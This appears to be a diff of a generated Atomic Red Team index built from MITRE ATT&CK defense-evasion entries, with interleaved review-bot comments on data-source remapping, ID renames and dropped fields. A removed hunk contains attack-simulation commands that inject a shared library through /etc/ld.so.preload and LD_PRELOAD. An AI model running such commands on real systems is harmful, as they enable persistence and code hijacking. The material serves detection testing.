File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: Monitoring for the removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended 
@@ -31574,12 +24103,12 @@ defense-evasion: ' elevation_required: true name: sh - T1484: + T1484.001: technique: external_references: - source_name: mitre-attack - external_id: T1484 - url: https://attack.mitre.org/techniques/T1484 + external_id: T1484.001 + url: https://attack.mitre.org/techniques/T1484/001 - source_name: TechNet Group Policy Basics url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/ description: 'srachui. (2012, February 13). Group Policy Basics – Part 1: @@ -31627,7 +24156,7 @@ defense-evasion: to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create - Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1035), + Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), \ and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many 
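Review bot: the @@ -31574 hunk renames the index key T1484 to T1484.001 and swaps the STIX id (attack-pattern--ebb42bbe-... to attack-pattern--5d2be8b9-...), so any consumer of index.yaml that looks up the parent id T1484 no longer finds an entry. Since this is a generated file, confirm the parent technique is still represented elsewhere in the index or the matrices, and say in the commit message that Group Policy Modification is now indexed under the sub-technique id; a silent key rename in a generated artifact is easy to miss.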
@@ -31641,38 +24170,37 @@ defense-evasion: set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify - GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)\n" - id: attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d + GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)" + id: attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-03-26T21:17:41.231Z' - created: '2019-03-07T14:10:32.650Z' - x_mitre_is_subtechnique: false - x_mitre_defense_bypassed: - - System access controls - - File system access controls - x_mitre_detection: "It is possible to detect GPO modifications by monitoring - directory service changes using Windows event logs. Several events may be - logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory - service object was modified\n* Event ID 5137 - A directory service object - was created\n* Event ID 5138 - A directory service object was undeleted\n* - Event ID 5139 - A directory service object was moved\n* Event ID 5141 - A - directory service object was deleted\n\n\nGPO abuse will often be accompanied - by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), - which will have events associated with it to detect. Subsequent permission - value modifications, like those to SeEnableDelegationPrivilege, can also be - searched for in events associated with privileges assigned to new logons (Event - ID 4672) and assignment of user rights (Event ID 4704). 
" - x_mitre_version: '1.1' + modified: '2021-02-09T15:52:24.315Z' + created: '2020-12-28T21:50:59.844Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator - User + x_mitre_detection: |- + It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including: + + * Event ID 5136 - A directory service object was modified + * Event ID 5137 - A directory service object was created + * Event ID 5138 - A directory service object was undeleted + * Event ID 5139 - A directory service object was moved + * Event ID 5141 - A directory service object was deleted + + + GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704). x_mitre_data_sources: - - Windows event logs + - 'Active Directory: Active Directory Object Creation' + - 'Active Directory: Active Directory Object Deletion' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' x_mitre_contributors: - Itamar Mizrahi, Cymptom - Tristan Bennett, Seamless Intelligence @@ -31718,8 +24246,9 @@ defense-evasion: modified: '2020-06-29T15:12:11.024Z' created: '2020-06-28T22:55:55.719Z' x_mitre_data_sources: - - File monitoring - - Windows Registry + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Modification' + - 'Firmware: Firmware Modification' x_mitre_permissions_required: - User - Administrator 
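Review bot: in the @@ -31641 hunk the x_mitre_defense_bypassed block (System access controls, File system access controls) is removed from the T1484.001 record and nothing replaces it, while x_mitre_permissions_required and x_mitre_detection are carried over. Confirm the upstream sub-technique object really has no defense-bypassed attribute rather than the generator dropping the field during the key rename; the move from the quoted "\n"-folded x_mitre_detection to a `|-` literal block is otherwise equivalent and reads better.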
@@ -31778,9 +24307,10 @@ defense-evasion: x_mitre_defense_bypassed: - Host forensic analysis x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'File: File Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Metadata' x_mitre_permissions_required: - User x_mitre_detection: Monitor the file system and shell commands for files being @@ -31960,8 +24490,9 @@ defense-evasion: modified: '2020-07-31T17:42:43.768Z' created: '2020-03-13T20:12:40.876Z' x_mitre_data_sources: - - File monitoring - - Authentication logs + - 'User Account: User Account Creation' + - 'User Account: User Account Metadata' + - 'File: File Modification' x_mitre_permissions_required: - root - Administrator @@ -32072,10 +24603,10 @@ defense-evasion: to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them. x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - PowerShell logs + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Script: Script Execution' + - 'File: File Modification' x_mitre_platforms: - macOS - Windows 
@@ -32136,12 +24667,21 @@ defense-evasion: modified: '2020-09-23T11:31:50.636Z' created: '2020-02-26T17:41:25.933Z' x_mitre_data_sources: - - API monitoring - - PowerShell logs - - Authentication logs - - Process command-line parameters - - Process monitoring - - File monitoring + - 'File: File Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Metadata' + - 'User Account: User Account Creation' + - 'User Account: User Account Metadata' + - 'File: File Modification' + - 'Script: Script Execution' + - 'Process: OS API Execution' + - 'Windows Registry: Windows Registry Key Modification' + - 'Firmware: Firmware Modification' + - 'Process: Process Creation' + - 'File: File Creation' + - 'Service: Service Creation' + - 'File: File Content' x_mitre_detection: Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell 
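Review bot: the x_mitre_data_sources list added in the @@ -32136 hunk contains duplicates: 'Process: Process Creation' and 'File: File Creation' each appear twice. The @@ -32517 hunk later in this patch removes the repeated 'Anti-virus' entries from x_mitre_defense_bypassed, so the generator should apply the same deduplication to data sources before emitting the list; otherwise the index overstates how many distinct data sources this technique has.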
@@ -32240,15 +24780,16 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-17T15:15:28.288Z' + modified: '2021-04-27T19:55:20.290Z' created: '2020-03-12T20:38:12.465Z' x_mitre_data_sources: - - Environment variable - - Loaded DLLs - - Process command-line parameters - - Process monitoring - - File monitoring - - DLL monitoring + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'File: File Creation' + - 'File: File Modification' x_mitre_detection: |- Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious. @@ -32264,7 +24805,7 @@ defense-evasion: x_mitre_defense_bypassed: - Anti-virus - Application control - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_platforms: - Linux @@ -32331,7 +24872,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-16T18:25:12.727Z' + modified: '2021-04-24T13:59:12.787Z' created: '2020-02-21T20:56:06.498Z' x_mitre_contributors: - Vikas Singh, Sophos 
@@ -32352,12 +24893,8 @@ defense-evasion: arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. " x_mitre_data_sources: - - PowerShell logs - - Process command-line parameters - - Environment variable - - File monitoring - - Authentication logs - - Process monitoring + - 'Sensor Health: Host Status' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -32418,28 +24955,27 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-19T16:31:35.249Z' + modified: '2021-04-24T13:59:13.144Z' created: '2020-02-21T20:22:13.470Z' x_mitre_platforms: - - Linux - Windows + - Office 365 + - IaaS + - Linux - macOS - - AWS - - GCP - - Azure + - Containers x_mitre_data_sources: - - GCP audit logs - - Azure activity logs - - AWS CloudTrail logs - - Anti-virus - - Services - - API monitoring - - Environment variable - - Authentication logs - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows Registry + - 'Process: Process Termination' + - 'Windows Registry: Windows Registry Key Modification' + - 'Windows Registry: Windows Registry Key Deletion' + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'Sensor Health: Host Status' + - 'Script: Script Execution' + - 'Firewall: Firewall Disable' + - 'Firewall: Firewall Rule Modification' + - 'Cloud Service: Cloud Service Modification' + - 'Cloud Service: Cloud Service Disable' x_mitre_detection: |- Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious. 
@@ -32457,7 +24993,7 @@ defense-evasion: - Administrator - User x_mitre_is_subtechnique: false - x_mitre_version: '1.0' + x_mitre_version: '1.1' atomic_tests: [] T1562.006: technique: @@ -32508,7 +25044,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-07-09T14:43:42.450Z' + modified: '2021-01-13T15:56:04.897Z' created: '2020-03-19T19:09:30.329Z' x_mitre_platforms: - Windows @@ -32517,17 +25053,16 @@ defense-evasion: x_mitre_contributors: - Rob Smith x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Sensor health and status + - 'Windows Registry: Windows Registry Key Modification' + - 'Sensor Health: Host Status' + - 'Command: Command Execution' x_mitre_detection: |- Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data. Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID} x_mitre_defense_bypassed: + - Anti-virus - Host intrusion prevention systems - - Anti-virus - - Anti-virus x_mitre_is_subtechnique: true x_mitre_version: '1.0' identifier: T1562.006 
@@ -32635,11 +25170,6 @@ defense-evasion: - Linux - macOS - Windows - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Anti-virus - - Binary file metadata x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection @@ -32663,7 +25193,7 @@ defense-evasion: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Indicator Removal on Host description: |- - Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/*. + Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred. external_references: 
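Review bot: the @@ -32635 hunk deletes the whole x_mitre_data_sources block (Process monitoring, Process command-line parameters, Anti-virus, Binary file metadata) and adds nothing in its place, whereas every other data-source change in this patch maps the old names to 'Component: Data Source' entries. Confirm that upstream really has no data sources for this technique in the new model rather than the mapping failing for these four names.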
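Review bot: the @@ -32663 hunk correctly repoints the Bash History link from T1139 to T1552/003, but the unchanged context line "This that may compromise the integrity of security solutions" is ungrammatical. Because this file is generated from the ATT&CK data, the fix belongs upstream ("This may compromise ..."), so file it there rather than hand-editing index.yaml.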
@@ -32679,13 +25209,14 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-16T18:09:49.074Z' + modified: '2021-04-24T13:35:09.065Z' created: '2017-05-31T21:30:55.892Z' x_mitre_is_subtechnique: false x_mitre_platforms: - Linux - macOS - Windows + - Containers x_mitre_detection: File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system may require different detection mechanisms. @@ -32694,14 +25225,20 @@ defense-evasion: - Host intrusion prevention systems - Anti-virus x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - API monitoring - - Windows event logs + - 'Process: Process Creation' + - 'File: File Deletion' + - 'File: File Modification' + - 'Windows Registry: Windows Registry Key Modification' + - 'Windows Registry: Windows Registry Key Deletion' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Network Traffic: Network Traffic Content' + - 'User Account: User Account Authentication' + - 'File: File Metadata' x_mitre_contributors: + - Brad Geesaman, @bradgeesaman - Ed Williams, Trustwave, SpiderLabs - x_mitre_version: '1.1' + x_mitre_version: '1.2' identifier: T1070 atomic_tests: - name: Indicator Removal using FSUtil @@ -32767,10 +25304,8 @@ defense-evasion: - Application control - Application control by file name or path x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_contributors: - Matthew Demaske, Adaptforward x_mitre_version: '1.1' 
@@ -32903,8 +25438,10 @@ defense-evasion: - Travis Smith, Tripwire - Itzik Kotler, SafeBreach x_mitre_data_sources: - - SSL/TLS inspection - - Digital certificate logs + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: |- A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017) @@ -33130,8 +25667,8 @@ defense-evasion: - Travis Smith, Tripwire - Casey Smith x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous @@ -33733,9 +26270,7 @@ defense-evasion: - macOS - Windows x_mitre_data_sources: - - File monitoring - - Process monitoring - - Binary file metadata + - 'File: File Metadata' x_mitre_detection: Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and 
@@ -33788,157 +26323,27 @@ defense-evasion: entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior. - x_mitre_data_sources: - - Binary file metadata - - Malware reverse engineering - - Process monitoring x_mitre_version: '2.0' atomic_tests: [] - T1574.006: + T1222.002: technique: - id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825 + created: '2020-02-04T19:24:27.774Z' + modified: '2020-03-29T23:12:40.041Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345 description: |- - Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) + Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). 
- Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997) + Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode). - LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process. - name: LD_PRELOAD + Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). 
+ name: Linux and Mac File and Directory Permissions Modification created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.006 - url: https://attack.mitre.org/techniques/T1574/006 - - external_id: CAPEC-13 - source_name: capec - url: https://capec.mitre.org/data/definitions/13.html - - external_id: CAPEC-640 - source_name: capec - url: https://capec.mitre.org/data/definitions/640.html - - source_name: Man LD.SO - url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html - description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved - June 15, 2020. - - source_name: TLDP Shared Libraries - url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html - description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved - January 31, 2020. - - source_name: Code Injection on Linux and macOS - url: https://www.datawire.io/code-injection-on-linux-and-macos/ - description: 'Itamar Turner-Trauring. (2017, April 18). “This will only hurt - for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved - December 20, 2017.' - - url: http://hick.org/code/skape/papers/needle.txt - description: skape. (2003, January 19). Linux x86 run-time process manipulation. - Retrieved December 20, 2017. - source_name: Uninformed Needle - - url: http://phrack.org/issues/51/8.html - description: halflife. (1997, September 1). Shared Library Redirection Techniques. - Retrieved December 20, 2017. 
- source_name: Phrack halfdead 1997 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T16:49:46.904Z' - created: '2020-03-13T20:09:59.569Z' - x_mitre_platforms: - - Linux - x_mitre_data_sources: - - Process monitoring - - File monitoring - - Environment variable - x_mitre_detection: |- - Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes. - - Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - identifier: T1574.006 - atomic_tests: - - name: Shared Library Injection via /etc/ld.so.preload - auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 - description: "This test adds a shared library to the `ld.so.preload` list to - execute and intercept API calls. This technique was used by threat actor Rocke - during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon - successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. 
- \n" - supported_platforms: - - linux - input_arguments: - path_to_shared_library_source: - description: Path to a shared library source code - type: Path - default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c - path_to_shared_library: - description: Path to a shared library object - type: Path - default: "/tmp/T1574006.so" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_to_shared_library}) - -' - prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - -' - executor: - command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - -' - cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - -' - name: bash - elevation_required: true - - name: Shared Library Injection via LD_PRELOAD - auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae - description: | - This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. - - Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. 
- supported_platforms: - - linux - input_arguments: - path_to_shared_library_source: - description: Path to a shared library source code - type: Path - default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c - path_to_shared_library: - description: Path to a shared library object - type: Path - default: "/tmp/T1574006.so" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_to_shared_library}) - -' - prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - -' - executor: - command: 'LD_PRELOAD=#{path_to_shared_library} ls - -' - name: bash - T1222.002: - technique: external_references: - source_name: mitre-attack external_id: T1222.002 
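Review bot: the @@ -33788 hunk removes the entire T1574.006 (LD_PRELOAD) entry, including both atomic tests (Shared Library Injection via /etc/ld.so.preload and via LD_PRELOAD), from the defense-evasion section and re-emits only T1222.002 in its place; nothing in this hunk re-adds T1574.006. Its kill_chain_phases also list persistence and privilege-escalation, so confirm the technique and its two tests are still emitted under one of those sections and still appear in the Linux index; otherwise the generated index silently drops tests. Separately, the x_mitre_data_sources block of the preceding technique (Binary file metadata, Malware reverse engineering, Process monitoring) is deleted here with no replacement entries, unlike the rest of the patch.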
@@ -33951,39 +26356,22 @@ defense-evasion: description: Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018. source_name: Hybrid Analysis Icacls2 May 2018 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Linux and Mac File and Directory Permissions Modification - description: |- - Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). - - Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode). - - Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). 
- id: attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-29T23:12:40.041Z' - created: '2020-02-04T19:24:27.774Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - root + x_mitre_platforms: + - macOS + - Linux + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Metadata' x_mitre_detection: |- Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_platforms: - - macOS - - Linux + x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' identifier: T1222.002 atomic_tests: - name: chmod - Change file or folder mode (numeric mode) 
@@ -34196,14 +26584,7 @@ defense-evasion: name: sh T1078.003: technique: - external_references: - - source_name: mitre-attack - external_id: T1078.003 - url: https://attack.mitre.org/techniques/T1078/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Local Accounts + id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 description: "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for @@ -34212,7 +26593,14 @@ defense-evasion: and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. " - id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 + name: Local Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078.003 + url: https://attack.mitre.org/techniques/T1078/003 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack 
@@ -34223,23 +26611,25 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-23T21:48:41.083Z' + modified: '2021-04-05T12:51:00.663Z' created: '2020-03-13T20:26:46.695Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Perform regular audits of local system accounts to detect - accounts that may have been created by an adversary for persistence. Look - for suspicious account behavior, such as accounts logged in at odd times or - outside of business hours. - x_mitre_data_sources: - - Authentication logs x_mitre_platforms: - Linux - macOS - Windows + - Containers + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_detection: Perform regular audits of local system accounts to detect + accounts that may have been created by an adversary for persistence. Look + for suspicious account behavior, such as accounts logged in at odd times or + outside of business hours. + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' identifier: T1078.003 atomic_tests: - name: Create local account with admin priviliges 
@@ -34260,6 +26650,15 @@ defense-evasion: elevation_required: true T1127.001: technique: + id: attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96 + description: |- + Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild) + + Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild) + name: MSBuild + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1127.001 
